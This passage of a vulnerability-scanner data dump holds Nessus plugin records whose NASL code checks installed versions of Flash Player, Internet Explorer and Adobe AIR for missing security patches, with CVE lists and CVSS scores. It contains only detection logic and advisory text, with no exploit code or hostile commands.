value:\"2015/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.481\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.481\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:36", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote\n attackers to take over the system (bsc#937339).", "edition": 18, "published": "2015-07-09T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5119"], "modified": "2015-07-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-473.NASL", "href": "https://www.tenable.com/plugins/nessus/84629", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-473.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84629);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5119\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)\");\n script_summary(english:\"Check for the openSUSE-2015-473 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote\n attackers to take over the system (bsc#937339).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937339\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.481-2.61.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T04:09:47", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2925418.\n\nThe installed version of IE is affected by multiple privilege\nescalation and memory corruption vulnerabilities that could allow an\nattacker to execute arbitrary code on the remote host. Additionally,\nthe installed version of IE is affected by an information disclosure\nvulnerability.", "edition": 31, "published": "2014-03-11T00:00:00", "title": "MS14-012: Cumulative Security Update for Internet Explorer (2925418)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0307", "CVE-2014-0313", "CVE-2014-0303", "CVE-2014-0322", "CVE-2014-0305", "CVE-2014-0299", "CVE-2014-0314", "CVE-2014-0306", "CVE-2014-0297", "CVE-2014-0321", "CVE-2014-0311", "CVE-2014-0304", "CVE-2014-4112", "CVE-2014-0312", "CVE-2014-0298", "CVE-2014-0324", "CVE-2014-0308", "CVE-2014-0302", "CVE-2014-0309"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS14-012.NASL", "href": "https://www.tenable.com/plugins/nessus/72930", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72930);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2014-0297\",\n \"CVE-2014-0298\",\n \"CVE-2014-0299\",\n \"CVE-2014-0302\",\n \"CVE-2014-0303\",\n \"CVE-2014-0304\",\n \"CVE-2014-0305\",\n \"CVE-2014-0306\",\n \"CVE-2014-0307\",\n \"CVE-2014-0308\",\n \"CVE-2014-0309\",\n \"CVE-2014-0311\",\n \"CVE-2014-0312\",\n \"CVE-2014-0313\",\n \"CVE-2014-0314\",\n \"CVE-2014-0321\",\n \"CVE-2014-0322\",\n \"CVE-2014-0324\",\n \"CVE-2014-4112\"\n );\n script_bugtraq_id(\n 65551,\n 66023,\n 66025,\n 66026,\n 66027,\n 66028,\n 66029,\n 66030,\n 66031,\n 66032,\n 66033,\n 66034,\n 66035,\n 66036,\n 66037,\n 66038,\n 66039,\n 66040,\n 70266\n );\n script_xref(name:\"CERT\", value:\"732479\");\n script_xref(name:\"EDB-ID\", value:\"32851\");\n script_xref(name:\"EDB-ID\", value:\"32438\");\n script_xref(name:\"EDB-ID\", value:\"32904\");\n script_xref(name:\"MSFT\", value:\"MS14-012\");\n script_xref(name:\"MSKB\", value:\"2925418\");\n\n script_name(english:\"MS14-012: Cumulative Security Update for Internet Explorer (2925418)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2925418.\n\nThe installed version of IE is affected by multiple privilege\nescalation and memory corruption vulnerabilities that could allow an\nattacker to execute arbitrary code on the remote host. Additionally,\nthe installed version of IE is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-030/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-031/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-032/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-034/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-035/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-036/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-012\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2, 8, 2012, 8.1, and 2012 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-012';\nkb = '2925418';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.16521\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.20963\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.16843\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.16521\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.20963\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.16843\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.20651\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.16540\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22597\", min_version:\"8.0.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18392\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20651\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16540\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23569\", min_version:\"8.0.6001.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19507\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.23330\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.19041\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23569\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21371\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5294\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23569\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21371\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6512\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T01:13:48", "description": "According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)", "edition": 31, "published": "2015-07-09T00:00:00", "title": "Adobe AIR for Mac <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84643", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84643);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Adobe AIR for Mac <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 18.0.0.180 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '18.0.0.144';\nfixed_version_for_report = '18.0.0.180';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T00:10:39", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 18.0.0.194. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, 